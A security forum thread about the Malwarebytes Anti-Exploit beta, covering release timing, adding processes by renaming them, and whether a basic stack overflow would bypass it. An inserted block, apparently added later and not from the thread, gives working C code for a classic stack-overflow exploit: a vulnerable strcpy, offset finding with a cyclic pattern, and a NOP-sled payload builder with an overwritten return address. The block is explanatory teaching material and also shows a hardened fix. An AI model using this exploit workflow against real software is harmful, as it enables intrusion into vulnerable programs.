Malwarebytes Anti-Exploit

Discussion in 'other anti-malware software' started by ZeroVulnLabs, Oct 15, 2013.

  1. DBone

    DBone Registered Member

    Joined:
    Nov 24, 2010
    Posts:
    1,041
    Location:
    SoCal USA
    Hey pbust, sorry if this has been asked/answered here recently, but do you have a target date for final release of MAE?
     
  2. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    Not really.

    A vulnerability is a weakness in a program. An exploit is code designed to make use of that weakness.

    On XP all addresses are predictable so no additional vulnerabilities (known as information leaks in this case) are necessary for exploitation, at least a type of exploitation that relies on ROP.

    What I'm saying is that when your program resides in the protected process address space and uses function hooking, knowing the addresses of the protector and protected functions will make bypassing much easier.

    I don't study IT by the way. I study CS. I have a double major that includes computer security and that's certainly treated as IT though. I have a moderate amount of experience writing trivial exploits, like the ones that would work on an XP system. Just to clear things up there lol
     
    Last edited: Jan 4, 2014
  3. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
Ahh, so you actually have written some now! Last year you said you would post a link to them, if/when you wrote any. I'm sure I'm not the only one who would like to test them, as I mentioned at the time. Posting links to PoCs is OK on here, so please do so :thumb:
     
  4. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I suppose I could post them. They're basic exploits. EIP control in a piece of software that does nothing but take in user input and exit, essentially.

    I am not at school and don't have access to it but I think I had a full 512B space for my shellcode and no need for ROP (binary not compiled with ASLR).

    It is a Linux binary though.
     
  5. ZeroVulnLabs

    ZeroVulnLabs Developer (aka "pbust")

    Joined:
    Mar 5, 2012
    Posts:
    1,189
    Location:
    USA
    Once we finish the engine we'll work on this.

    Sorry, nothing set in stone yet.

    If you do find something as described that works against MBAE please do post it.
     
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    Is there a way to manually add a process to MBAE's guard?
     
  7. Solarlynx

    Solarlynx Registered Member

    Joined:
    Jun 25, 2011
    Posts:
    2,015
    It would be awesome to add processes manually.
     
  8. kupo

    kupo Registered Member

    Joined:
    Jan 25, 2011
    Posts:
    1,121
    I think so too. Even if it is through the registry, so that we could test whether MBAE is compatible with other applications.
     
  9. ZeroVulnLabs

    ZeroVulnLabs Developer (aka "pbust")

    Joined:
    Mar 5, 2012
    Posts:
    1,189
    Location:
    USA
    The only way for now is to change the name of the process to one of the supported ones, e.g.:

    iexplore.exe
    chrome.exe
    firefox.exe
    opera.exe
    winword.exe
    excel.exe
    ... etc.
     
  10. vojta

    vojta Registered Member

    Joined:
    Feb 26, 2010
    Posts:
    830
    I am curious to know which processes you want to add to MBAE. Don't get me wrong, I'd like to see this feature too, but you can hardly find a real exploit (not a proof of concept) that affects any program not already supported by MBAE.

    At least MBAE is quite light on resources, I'm always in awe when I see people applying EMET to everything that runs, flies or swims.
     
  11. fblais

    fblais Registered Member

    Joined:
    Jul 31, 2008
    Posts:
    1,341
    Location:
    Québec, Canada
    Naive question, but what happens if malware is saved with one of these filenames?
    Signatures are not checked at all?
     
  12. FleischmannTV

    FleischmannTV Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    1,093
    Location:
    Germany
    If a program uses simple filename whitelisting, yes.
     
  13. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    That's easy enough.
     
  14. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I'm sure I could use a Firefox exploit or some other attack. But if I can just rename a 30 line program to firefox.exe and get shell that's much easier both for me and for users to recreate the attack.
     
  15. vojta

    vojta Registered Member

    Joined:
    Feb 26, 2010
    Posts:
    830
    I see what you are trying to accomplish. Other people want to add processes to gain protection and, frankly, it's difficult to find an exploit that is not designed for Java, Flash, Adobe, Office or some browser.
     
  16. ZeroVulnLabs

    ZeroVulnLabs Developer (aka "pbust")

    Joined:
    Mar 5, 2012
    Posts:
    1,189
    Location:
    USA
    Just remember MBAE protects against RCE type exploits with the objective of preventing the exploit-driven infection/breach in the first place. So basically no priv escalation and other types of stuff. Once you are infected/breached it is game over anyway and outside the scope of MBAE.

    Also you need to take into consideration that browsers include certain protections already and behave in a certain way, so creating a firefox.exe program which accepts a remote shell for example does not really prove anything.

    But I think you know all this already.
     
  17. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    This won't be payload driven, purely a protected process that will encounter a very basic stack overflow leading to control of EIP, which I'll point back into the buffer to execute my instructions.

    It is not an API design issue or some such thing. It's by-the-book memory corruption. Don't worry :p I'll play fair.
     
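    The exploit workflow Hungry Man describes in posts 4 and 17 (a fixed 512-byte stack buffer, a binary with no ASLR and an executable stack, EIP overwritten to point back into the buffer), as an added example that is not code from the thread or from MBAE. It generalizes the one case in the post slightly: it also shows the cyclic-pattern step used to find the return-address offset and a bounded copy as the fixed form. The 512-byte size, the 0xbffff0a0 buffer address, the crash value 0x41346141 and the int3 stand-in for shellcode are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not code from the thread): the classic no-ASLR, executable-
 * stack exploit workflow for a program that only takes user input and exits.
 * Sizes and addresses below are illustrative assumptions. */

#define BUF_SIZE 512                      /* assumed: the 512-byte buffer from the post */
#define PATTERN_MAX (26 * 26 * 10 * 3)    /* full [A-Z][a-z][0-9] pattern length */

/* Vulnerable: unbounded strcpy into a fixed stack buffer. Input longer than
 * BUF_SIZE-1 bytes overwrites the saved frame pointer and return address. */
void vulnerable_echo(const char *input)
{
    char buf[BUF_SIZE];
    strcpy(buf, input);                   /* no bounds check: this is the bug */
    printf("got %zu bytes\n", strlen(buf));
}

/* Hardened: same behaviour, oversize input rejected. 0 on success, -1 if it
 * would not fit together with its terminator. */
int safe_echo(const char *input)
{
    char buf[BUF_SIZE];
    size_t n = strlen(input);
    if (n >= BUF_SIZE)
        return -1;
    memcpy(buf, input, n + 1);
    printf("got %zu bytes\n", n);
    return 0;
}

/* Step 1: cyclic pattern (same [A-Z][a-z][0-9] triplet scheme as Metasploit's
 * pattern_create) so the crash reveals the exact offset of the saved EIP.
 * Writes len bytes plus a NUL; out must hold len + 1 bytes. */
size_t pattern_create(char *out, size_t len)
{
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z' && pos < len; u++)
        for (char l = 'a'; l <= 'z' && pos < len; l++)
            for (char d = '0'; d <= '9' && pos < len; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && pos < len; i++)
                    out[pos++] = trip[i];
            }
    out[pos] = '\0';
    return pos;
}

/* Step 2: given the 4 bytes that landed in EIP (as they sat in memory),
 * return their position in the pattern, i.e. the offset to the return address. */
long pattern_offset(const char *needle)
{
    static char full[PATTERN_MAX + 1];
    pattern_create(full, PATTERN_MAX);
    const char *hit = strstr(full, needle);
    return hit ? (long)(hit - full) : -1;
}

/* Same lookup from the faulting EIP the debugger reports: x86 is little-endian,
 * so EIP 0x41346141 means the bytes "Aa4A" were in memory at that offset. */
long pattern_offset_from_eip(uint32_t eip)
{
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((eip >> (8 * i)) & 0xff);
    needle[4] = '\0';
    return pattern_offset(needle);
}

/* Step 3: lay out [NOP sled][shellcode][saved EIP -> middle of the sled].
 * Without ASLR the buffer address is stable across runs, so no info leak and
 * no ROP are needed. Returns payload length, or -1 if it cannot fit. */
long build_payload(uint32_t buf_addr, size_t ret_offset,
                   const uint8_t *shellcode, size_t sc_len,
                   uint8_t *out, size_t out_cap)
{
    if (sc_len > ret_offset || out_cap < ret_offset + 4)
        return -1;
    size_t nops = ret_offset - sc_len;
    memset(out, 0x90, nops);                          /* 0x90 = x86 NOP */
    memcpy(out + nops, shellcode, sc_len);
    uint32_t ret = buf_addr + (uint32_t)(nops / 2);   /* land inside the sled */
    for (int i = 0; i < 4; i++)                       /* little-endian EIP */
        out[ret_offset + i] = (uint8_t)((ret >> (8 * i)) & 0xff);
    return (long)(ret_offset + 4);
}

/* strcpy stops at the first NUL, so a payload delivered through it must be
 * NUL-free (choose a sled address whose bytes avoid 0x00). 1 if OK, else 0. */
int payload_is_nul_free(const uint8_t *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0x00)
            return 0;
    return 1;
}

int main(void)
{
    static const uint8_t sc[4] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* constructed stand-in: int3 x4 */
    uint8_t payload[BUF_SIZE + 64];
    long off = pattern_offset_from_eip(0x41346141u);        /* assumed crash EIP */
    long len = build_payload(0xbffff0a0u, 516, sc, sizeof sc, payload, sizeof payload);
    printf("offset to EIP: %ld, payload %ld bytes, NUL-free: %d\n",
           off, len, payload_is_nul_free(payload, (size_t)len));
    vulnerable_echo("short input, no overflow");            /* safe to run as-is */
    return safe_echo("short input");
}
```

    The 516-byte offset in main is the value the pattern step would hand back on a typical 32-bit build (512 bytes of buffer plus a saved frame pointer); on a real target you take whatever pattern_offset_from_eip returns for the actual crash, and a build with ASLR or NX breaks the "point EIP back into the buffer" step and forces an information leak or ROP instead, which is the distinction post 2 draws about XP.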
  18. The real deal is to create a buffer overflow situation which results in a predictable address to misuse, this is certainly not the case with ALL buffer overflows.
     
  19. ZeroVulnLabs

    ZeroVulnLabs Developer (aka "pbust")

    Joined:
    Mar 5, 2012
    Posts:
    1,189
    Location:
    USA
    The real deal is pitting MBAE against new real-world exploits as they are released and therefore not previously known to MBAE. You can do this with ITW exploits and more reliably with exploits from Metasploit and older versions of MBAE.

    We all know that no single software in the world is safe from a targeted attack to it, so attacking MBAE specifically does not prove anything about its exploit detection capabilities.

    MBAE works by applying special techniques in multiple layers to the concept of "application families" such as browsers, media players, PDF readers, etc. based on the design of those applications, as opposed to EMET which is more generalist in nature in terms of applying mitigations to apps. An ad-hoc application called firefox.exe will obviously not behave like the real Firefox and will not be in line with the detection logic that MBAE applies to the real Firefox.

    But I am looking forward to seeing what you develop since the devil is in the details.
     
  20. I am not developing anything.

    I am looking forward to the MBAE release which includes mail clients also (e.g. Outlook). I have played with it and was impressed that injected DLLs were blocked in the browser. I know you can't claim invincibility but blocking specific behaviour patterns in vulnerable processes reduces the risk of exploits being exploitable on a specific configuration.
     
  21. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    @MBAE,

    This is how I feel. While detection logic such as "is it making an outbound connection" may trigger logic, and therefore be invalid for other programs, a buffer overflow is fairly generic.

    But I'll just be posting the vulnerable code and how to exploit it. In terms of reverse engineering MBAE and bypassing it that's work for the summer, where they pay me for that sort of thing :p

    Maybe GullibleJones will take it and run with it. He's pretty good with this stuff.

    It is without ASLR. EIP control is pretty typical/ basic.
     
  22. deugniet

    deugniet Registered Member

    Joined:
    Nov 25, 2013
    Posts:
    1,244
    I opened both Office Word and Excel 2007 and MBAE beta .0250 won't protect them.
     
    Last edited: Jan 9, 2014
  23. ZeroVulnLabs

    ZeroVulnLabs Developer (aka "pbust")

    Joined:
    Mar 5, 2012
    Posts:
    1,189
    Location:
    USA
  24. deugniet

    deugniet Registered Member

    Joined:
    Nov 25, 2013
    Posts:
    1,244
    Thanks for info.
     
  25. 1PW

    1PW Registered Member

    Joined:
    Apr 2, 2010
    Posts:
    1,938
    Location:
    North of the 38th parallel.
    Last edited: Jan 20, 2014